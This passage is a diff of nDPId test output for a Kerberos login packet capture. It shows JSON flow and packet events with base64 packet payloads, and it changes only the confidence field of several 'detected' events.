{"hostname":"","domain":"denydc.com","username":""}} 
02067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946716067513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1247,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1247,"pkt_l4_len":1213,"thread_ts_msec":946716067513,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATRSN8AAIARyjQKBQMBCgEMAgBYBCsEvSnpbYIEsTCCBK2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN+YYIDejCCA3agAwIBBaEMGwpERU5ZREMuQ09NoikwJ6ADAgECoSAwHhsETERBUBsWdnBjLXcyazNlbnQuZGVueURDLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMeZ+KqfWvHOiOlvE9U+\/Ap34+Yt57qkqs1sAkSCSkL4e+hCYvkF8IUKlNxjuJw+7aJnQYXbcAu8nj\/MZhAr8\/AQDDRGhb7NmunEZ8MP2jGdsJGpucl0GgoDcxhaZmF1A42v9zW3pYZJ3UBJ\/NhLFn5nPJv4n4xm+DhSCPGMJ2ELHdugapK4G6h+KxNz3a7XkoTRAyq1IOiXos\/ZgpNuA71IjNF8wd79Q9NihpYsbMj99UkLQGg+GNZ7anXXyZI37LVqkETaT3MiD3wW8JGRaTCo9KqZMDmM6RXIQV44jn+bs49OWkhbut7joQbi5nc8CBEZMHt6YGc9PNZVW5rt9fkNjpZvaTIpt9ihZ04BLsGbj+r5YMmqKf4W+tRo79Atk2aXqrFfQzORmO7xaor40bgOryiDneGjjHxjO\/5QleLF7irh6shtpF6Pn2svcJalC1MnlAHVsEjB9vqlLFkb0c3P9kGCP\/R82P4mEHKdTJBcv8pNJexa6qYwr2lBqDYghon+AlS91wyvXv9KIjmq\/xpzHy4GDuVTfCb+OvpUgtXBWhzgnLJD4UXMbtQTtrXmldZAqwP7VBZyLuoU8ofEOdN62q0FUwXGThyIa+U7S5FAF3Q9brpCuLQVgQfL+wd4hMDQNB1I+a3VnrsEXXBhb\/jrZSppMn8yfrFxKORmdJBXvp9xYUlgRZ5BQKrYfpuuHK0hAPnxe4g5MFMi3OQ6bpel\/YsFKJlTmHXK0WpbcIGWtmKdpT6spw96zcwDv4ApZLswgucQljrD3IDu46fxN9dcf53+h+KPUMzRs0dhAmptPJAxU559MGsf+PAXSMH4cC1ztoftxzGM9De1qctOOrMoL4srK0Au7+bF3iig3d3AXdhA+kWkv+dQJcTdFZycTKiVnx\/PKFG8CMFKL9OnxCPbFNn4PALfTRcGmA+tiev3SoOAZ1dzrKgqmw\/HQQlXYgqfl8o7ybmqflImt2PMqKiBN56dMsVpJ5TOUqnqCRIOVhxnWNL8o5AwGSVbpJs3GkXcsGfeXlozdCO74IWjMaPJoCt6QdSriBmpnbyRb3jpoH+MIH7oAMCAQOigfMEgfCUTXHX1aELiQlzKCsczFe+C2IqPAVGDFuPZzq+owK6ABcQxAODKKz5mwDrc9QttnnbgOci\/9zrjmZqaH+P5gUo2fja8sx3prrxiY4cFcT1nNZarJllSgUase3wPlmtd3i1yQqAsDzF5bEwq1nO4VnA12YySXQVzxwv3HQD6oweqLHEZ3oU4VeZG\/dQArj1xD6pvQRf3o8u5a4PxiyC32tuMj0FVsdoB8O7azCA2z4GdVx1QCbiZECr0pFHPOzV
N9bWYT0DYM5+ia9ZccCJY\/vgfXRXSZ2ZyLLSAPvAdjJQEV6+TmTizQnNsMr6i2+HGTI="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946716067526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1251,"pkt_l4_len":1217,"thread_ts_msec":946716067526,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATVAKkAAIAREmcKAQwCCgUDAQQsAFgEwZU2bIIEtTCCBLGhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZo
lKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgNeoX1w44rBG4C\/VapcvnoZR3r28u32Kb2ufqFlDeRBviPxhnH2sl\/neUX6tzO4Fk6hSlL5WBXV+EulgZYNYyiRx5ceWwlRK69YQjwPipIJ+arQYW+UcF4xjMryagpJPCl4lEAT9VaABN1keDumZpmnf0Qe1QvOEVx1AY35W6Y1upHAwbqAHAwUAYIEAEKIMGwpERU5ZREMuQ09Nox8wHaADAgECoRYwFBsGa3JidGd0GwpERU5ZREMuQ09NpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQLr8wWqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02054{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946716067526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1229,"pkt_l4_len":1195,"thread_ts_msec":946716067526,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS\/SOAAAIARykUKBQMBCgEMAgBYBCwEqyGEbYIEnzCCBJugAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN0YYIDcDCCA2ygAwIBBaEMGwpERU5ZREMuQ09Noh8wHaADAgECoRYwFBsGa3JidGd0GwpERU5ZREMuQ09No4IDNDCCAzCgAwIBF6EDAgECooIDIgSCAx6vJykUYq7rXgspxAjLDVvb\/eZ\/5SrdtOCJzqXUtt2Ah28Wot4qbXjaGxnLhBAQCoQatRNPUUAPrQ8zoml9NWokGWomJv2qTEivbx60WTGui08nHOfUk7F5qQH9bhtJ8abeZf4t+DjAEokvn7ksEkhPny6zq1MrOGAVB4Ul9SIAQzxOeI\/OpAGQD8ceGXAVh2mZar8I6BSGPY3dyelogzcpLkjfnWgD6u9FAYv7fwZScCXowx4Ajl3lVBIIxu3HXbdLeoV64LDJ9L47nLS7\/sNoqSZLrAE8Bh1KTK\/3jczuD4uDNaT3DImLzkK\/fJsgLOfE9n\/2TEsqPtnYiZfdZLA3cuodRWE7478J\/LK1zer68y5eihQHLQsEz1iYLZvrWp1mxXgY31KPd7DlEySrVH4V0SP9tDhG9Pq0KeDBWGByHBytauJJ0BCz8KepRMF9V8VjDRkIqa6fzCw7Wn2PrTGQYj4H+\/gHTLjuBA6muibnCaep\/PCHjAXWUtFhQa4fyxoBfg7dIcpGdJk46w8dkUiJScAZeH5a1aLrO9BEtcyjalAqUdpw9mIcWL50BW8CvQtPKBvVUcxLUQStoAENW90O31IBEJOeVsstA0IssuFCUMFJBomyVXqrk3M2ys+dCavzcp
Fw8VySmRzlp\/zkPrsvHrNco78fht26hcgazpRKQKhie9ZWnbX4pxmFG2OUwqtsk8QYG\/P1n0MbH1Y7i4TBZhRbNG4o5Bh5lvgbHRi0OsCLCI6r8BuwvTEpaZE9dQAkn8zHGZ7Wvm6ogSO3Ehe00DhO3BtemeBb2GCd\/7oTTtFtkmoAy+R+52MYDbp7XV1rhUtrrh2Beenw+1kKhgBAIu\/L4tnzMRm\/\/67kp1BQMtgMn\/Ya1sZSp9Wh+AeHxLdggXxaLidmGf3uML8PIGgOkOC\/PzXyXbzQr2Ztwkf98KcJALe6znANzSqsjAHTIGRoYLLaIo8wV65YOPXMvbomM4liduHgsE17Z0zbX2bWGR3n3VJvKMzI8MThIOCSaSabidZ9fdhXaGIe3kEsws0rNf7ervrXKA2f2LhzYA2mgfYwgfOgAwIBA6KB6wSB6LNxqnKZoBpVseqJF63SOoWKwxsKkbRKUcgerkds+Ze7+WHPbMBENUdvuM93lTtPNuD3VFE4ejhUJ2WV2pVN1Ntr\/jegcZxqISsi7WOnNPd1U07BpdVdLZ09DJiqymXLMDvFQrcI2QQFgDeS5uBE8nSM\/a\/SRbUjGKHI\/6yYlC0GpktmAui+zE40fGuY5n5ZpOZz8nBIv+PyNMML5Tr7EUUS06rJ6+Ly\/EsnBNSSzmpZ\/tyCcHdf3vL4ZAh5KT\/katkpJUYRXHxevx7bGMx3eQLUIpbqvIeNE93m6dinwq01lAEpOLLMrws="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946716067819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1250,"pkt_l4_len":1216,"thread_ts_msec":946716067819,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATUAMoAAIAREkcKAQwCCgUDAQQtAFgEwPDJbIIEtDCCBLChAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgNL0L+xYmPXFJ2U4kmPBnFHcqQ2kURDhc7sJ1m4jCUZ3aGX1OMmCD0W3u83F3YAN1E64NrK4rVi0jv0dwvc6PCbHAYvM6a0Q4aMYH5PjvHNv0XCuHkBNezkY7kSGMz7+UmeXeYM8t7nSKwEidTLd6P+W3RDUXi0Wg6\/u3kiBOewCpG8wbaAHAwUAQIAAAKIMGwpERU5ZREMuQ09Nox4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSlER
gPMjAzNzA5MTMwMjQ4MDVapwYCBAtX7q+oGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1208,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":1208,"midstream":0,"thread_ts_msec":946716067819,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
02048{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946716067819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":946716067819,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS+SRYAAIARyhAKBQMBCgEMAgBYBC0EqnlmbYIEnjCCBJqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggNzYYIDbzCCA2ugAwIBBaEMGwpERU5ZREMuQ09Noh4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSjggM0MIIDMKADAgEXoQMCAQmiggMiBIIDHqJ3xhJCOmnFhZcsfMi2k4AT3rpZUNDYWBgoBh3cCWwv3e\/6+fQvFTO8hJ00nDGPbF+\/RK62MoQ9fPP4MpnKhllWK8yjd2Pq6SPPUy1uAMfZFf4orggr2DXR5JbzE3nW8WHiTRJ89yk1S1V2P6Z0fqxMm1j\/oZ\/1T275Ok0CBW636P049zssULQkvCrNUUOPFwn6yEW4DKTWV6M3b7pEdMH0+jUsep4+M+4u+lATLJjUHV+M5ZxNjXUlbrnLpswgF3HQelRvuq3JlgwilWFg5yaK4oPONBIVuQRk\/dqjdDMqrliP+rekdrP\/Ntg0jzs+b7eZyqTajH71RxQdBtMoH7JFSNC0mpJuc9vkTpL8o2KveZDFX\/Jvts3JSQpy5Vf7RT2Xqim6BY\/6VjogqyZntyKUIPCf7fZ0MtnTicJkn+mCmSfkVxh54K1JzoyuBfNhohPsvA8yuv8s4P45LUoEMVprzZlnnKa5DPOyra7+zKWxoOmSV75rMLf1Q9ABsUNjukQWju0dcW45lJsPNa5jO6ExcxMGHsGfh5AI2OaBns2AEsD6BSU014ETQmVD7hiWI3yTaBi9ZYaCqFP543PEZ5tECSE9wOO9D3\/0p68Dyj8Jfx8HLGP3SucODMSnWClZRo00Ef5qAN8eSxFJpyDCJ5qmzY3gJILb\/mI16k2onygx5PwwYyf+KeUSQs1xSXJBTutUkUtBRv79jItwbl2O4ieTQZJeq6zQlABX3iza26xr4Nz+1WMWQzFijYd\/jpeKS7chsuX7h53\/nAj2AmSvTMExybNZu7lwWMOnL+\/VZBGwBdzpOPz5O2kuY3LkqvMO4vLpSTbav2hmSeGcGXCcalM7Jmw9zDVo2T5ScmAc0\/SXhn8Rzilrg\/OFjnZHCMOOdCGJNYNGWRuKSmj3yMsHbSQvesvgMvmFO0aSJQevbtZLRRLDRU4+Gh3FBsKzARnBIBjhyX6dj9OCbnAmj67xR44zBFfCstdL6a\/t17pLPnzwTYkNdamLXZn3sy3mcu6JToxloCBDsMb6lwkzkR2avyKLd0E83r3fd1zroZqU8KaB9jCB86ADAgEDooHrBIHotE3dMV7Nt6gGi\/VNhEhGOtqLUcP+uRJADDp0dHHjNSrc2MEGngFDiSU3IvPOQq2wSiGPvDqearPQ5ihBA\/Jb7pz7cJQAjuYx16sOfNoUgko2obQgzM63LPHsqiZ\/2Y8oyAYmAzZFsfALvarciWmxMSZQvgzJOayGHVpKKzhU1XHbqK5ZqBrKEdowVUsmTSO3irN7h1MfgNrKRBzrqypW+0W6RbyX+2p2cT1smrcGsERPDMuaaNKW3HCm4HZqQavWEeM+Xa
lCmQCzSt+ffuU2rtt3IHZk8L70YUm9Fxg8biTCr5OiBpt6DA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02103{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946716089644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1275,"pkt_l4_len":1241,"thread_ts_msec":946716089644,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATtAUEAAIAREbcKAQwCCgUDAQQyAFgE2RcQbIIEzTCCBMmhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9
cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgCnqqVTOVTpRzUXbeXaxK103wBWopURudtcug5Pe2sVn\/riDmysWHTfCcQh3A3iGP8I+3waJbA4vV2gXfJBBaCZePRcTa1JTarqNL46zUmLWaZiZRkM4aFGbLQzFVKKq4D+wB\/EE+nzyNOnIx0R2uErXwvhiOneUFFTaQBV4czpYpIGHMIGEoAcDBQBAgAAAogwbCkRFTllEQy5DT02jNTAzoAMCAQKhLDAqGwRsZGFwGxZ2cGMtdzJrM2VudC5kZW55REMuY29tGwpkZW55REMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQXCEP6qBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1233,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":1233,"midstream":0,"thread_ts_msec":946716089644,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946716089644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1279,"pkt_l4_len":1245,"thread_ts_msec":946716089644,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATxSg4AAIARyOUKBQMBCgEMAgBYBDIE3VF0bYIE0TCCBM2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggOKYYIDhjCCA4KgAwIBBaEMGwpERU5ZREMuQ09NojUwM6ADAgECoSwwKhsEbGRhcBsWdnBjLXcyazNlbnQuZGVueURDLmNvbRsKZGVueURDLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMeL\/RA92hD58Dn12Da9QWkJWnEJfArUcc4UzBD9SxldwhmoXd6\/obVbyD0LWmpxcMuaZeRlgizu0rrrcQTZgqtJbxXZlDfyJE2TYQcKUX3Isl\/Odh3JBqXColTPRxC6pkdGeZ3HzYaP0RgU8+UeyCvsTxoDY+foR\/W4Y90imjwA6kcoYW6sBqL9UtA9Xz16o6dXVtqa6a1X4vyB0tkj+dh2H1y3susl46D9QQ5x\/oPLYZ8vYlSw0kM0hvomNAEtbgGVvXv5KcQ139NIHAFoW9R+YkzlJTOfTMwZJRFug50mo3QBD+vmX3YrnLygH3Vcn9ZdN\/lx\/2ItwFMy9+zAmhaJgkW1wX0eu80ixoWoj63+2QNJP526LuZeHn3wt5S3Ez8VVrm0NwykytkVwh+pIWtIZumNqVHExRHbeBUs+HQZco2FIAUysiMl0p0V\/9dYr6NYjFP5SSBe0JQ3ME5PcKqJb80HkTTrAi02f+vIRD0oZd7kx1z